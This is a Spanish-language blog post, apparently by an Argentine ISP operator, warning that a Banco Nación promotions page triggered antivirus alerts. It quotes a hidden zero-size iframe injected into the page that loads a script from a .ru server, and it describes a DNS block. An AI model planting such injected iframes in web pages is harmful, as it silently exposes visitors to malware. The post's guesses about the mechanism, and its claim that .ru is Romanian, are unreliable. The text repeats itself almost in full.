ESPERO ESTAR METIENDO LA PATA ... Y QUE TODO SEA UNA EQUIVOCACION.
Esta historia comienza con una clienta coqueta.
Hace unas horas recibí un llamado de una cliente que me dice algo como:
“Entre a la pagina del Banco Nación para hacer una transferencia, y ya que estaba entre a curiosear unas ofertas de un botón “PARA ELLAS” y el antivirus me dice que tiene VIRUS!”
Estuve muy tentado, reconozco, de desestimar sus palabras con un tranquilizador “No te preocupes, Mujer, ¡Es el Banco Nación, el depositario de nuestros dineros, el guardián de nuestros ahorros! ¡Tienen cientos de ingenieros informáticos velando por nosotros!”
Por suerte no lo hice. Y por el contrario, mientras hablaba con ella, entre al Banco Nación (www.bna.com.ar), y busque el bendito botón. Un hermoso Botón fucsia animado, que dice “PARA ELLAS”, muy bien ubicado en la HOME PAGE, que nos lleva a la página (http://www.bna.com.ar/bp/bp_mujer_promociones.asp)
Al desplegar la página mi antivirus (AVG de GRISOFT – ¡GRATUITO!) también saltó, con el cartel que pueden ver abajo.
Si leen atentamente el aviso del AVG, la amenaza se encuentra en el archivo:
Baybear.ru:8080/index.php?pid=13
.ru? Rumania? El paraíso de los hackers? Una referencia a un servidor rumano en la web del Banco Nación?
Descargue el código fuente de la página y si bien no encontré en ningún lugar “Baybear.ru” si encontré (y en muchas partes de esta pagina, y sin ningún motivo aparente en la web), lo siguiente:
<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>
¡De nuevo un servidor rumano!
Para quien no este ducho en diseño web, el comando IFRAME permite meter dentro de una página WEB el contenido de otra página web.
El comando en cuestión (QUE ESTA DENTRO DEL CODIGO FUENTE DE LA PAGINA DEL BANCO NACION!) inserta dentro la pagina del BNA el contenido del archivo go.php del servidor nemohuildiin.ru . Y en realidad este archivo es un archivo PHP, es decir, no es un texto plano, sino que el servidor procesara comandos ubicados dentro del archivo.
La referencia a “Baybear.ru” esta dentro de ese archivo.
Es decir, cuando nuestra PC carga la pagina del BNA, el comando IFRAME le indica que debe cargar ese archivo. Nuestra PC entonces se comunica con nemohuildiin.ru para pedirle el archivo go.php. Este servidor, procesa este archivo (que vaya a saber que maléficas ordenes contendrá) y como resultado le entrega algo a nuestra PC.
Entre ese algo – Que sinceramente no se que será. Mis conocimientos no dan para tanto – también llega la orden para conectarnos a Baybear.ru para traernos otro archivo.
Y ahí es donde interviene AVG, salvándonos del desastre.
O al menos, todo esto es lo que yo creo que esta pasando.
Buscando en la web, ese comando IFRAME aparece en varias paginas
Tambien encontré un par de foros donde algunos usuarios plantearon también que su antivirus empezó a reportar VIRUS en sus paginas empresariales, con este mismo código IFRAME (Todos los post son de AYER).
Como soy ISP, y para evitar las infecciones de mis usuarios si es que esto realmente es un virus, lo que hice fue configurar en el DNS de mi router principal (en mi caso, un mikrotik) un ruteo estatico de nemohuildiin.ru a 127.0.0.1.
¡Si alguien tiene mas información, AVISEE !
Si esto es una falsa alarma, sepan disculpar.
En realidad seria bueno estar equivocado... porque este virus parece haber infectado unas cuantas Web Pages.
Esta historia comienza con una clienta coqueta.
Hace unas horas recibí un llamado de una cliente que me dice algo como:
“Entre a la pagina del Banco Nación para hacer una transferencia, y ya que estaba entre a curiosear unas ofertas de un botón “PARA ELLAS” y el antivirus me dice que tiene VIRUS!”
Estuve muy tentado, reconozco, de desestimar sus palabras con un tranquilizador “No te preocupes, Mujer, ¡Es el Banco Nación, el depositario de nuestros dineros, el guardián de nuestros ahorros! ¡Tienen cientos de ingenieros informáticos velando por nosotros!”
Por suerte no lo hice. Y por el contrario, mientras hablaba con ella, entre al Banco Nación (www.bna.com.ar), y busque el bendito botón. Un hermoso Botón fucsia animado, que dice “PARA ELLAS”, muy bien ubicado en la HOME PAGE, que nos lleva a la página (http://www.bna.com.ar/bp/bp_mujer_promociones.asp)
Al desplegar la página mi antivirus (AVG de GRISOFT – ¡GRATUITO!) también saltó, con el cartel que pueden ver abajo.
¡UN VIRUS EN LA PAGINA DEL BNA!
Si leen atentamente el aviso del AVG, la amenaza se encuentra en el archivo:
Baybear.ru:8080/index.php?pid=13
.ru? Rumania? El paraíso de los hackers? Una referencia a un servidor rumano en la web del Banco Nación?
Descargue el código fuente de la página y si bien no encontré en ningún lugar “Baybear.ru” si encontré (y en muchas partes de esta pagina, y sin ningún motivo aparente en la web), lo siguiente:
<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe>
¡De nuevo un servidor rumano!
Para quien no este ducho en diseño web, el comando IFRAME permite meter dentro de una página WEB el contenido de otra página web.
El comando en cuestión (QUE ESTA DENTRO DEL CODIGO FUENTE DE LA PAGINA DEL BANCO NACION!) inserta dentro la pagina del BNA el contenido del archivo go.php del servidor nemohuildiin.ru . Y en realidad este archivo es un archivo PHP, es decir, no es un texto plano, sino que el servidor procesara comandos ubicados dentro del archivo.
La referencia a “Baybear.ru” esta dentro de ese archivo.
Es decir, cuando nuestra PC carga la pagina del BNA, el comando IFRAME le indica que debe cargar ese archivo. Nuestra PC entonces se comunica con nemohuildiin.ru para pedirle el archivo go.php. Este servidor, procesa este archivo (que vaya a saber que maléficas ordenes contendrá) y como resultado le entrega algo a nuestra PC.
Entre ese algo – Que sinceramente no se que será. Mis conocimientos no dan para tanto – también llega la orden para conectarnos a Baybear.ru para traernos otro archivo.
Y ahí es donde interviene AVG, salvándonos del desastre.
O al menos, todo esto es lo que yo creo que esta pasando.
Buscando en la web, ese comando IFRAME aparece en varias paginas
Tambien encontré un par de foros donde algunos usuarios plantearon también que su antivirus empezó a reportar VIRUS en sus paginas empresariales, con este mismo código IFRAME (Todos los post son de AYER).
Como soy ISP, y para evitar las infecciones de mis usuarios si es que esto realmente es un virus, lo que hice fue configurar en el DNS de mi router principal (en mi caso, un mikrotik) un ruteo estatico de nemohuildiin.ru a 127.0.0.1.
¡Si alguien tiene mas información, AVISEE !
Si esto es una falsa alarma, sepan disculpar.
En realidad seria bueno estar equivocado... porque este virus parece haber infectado unas cuantas Web Pages.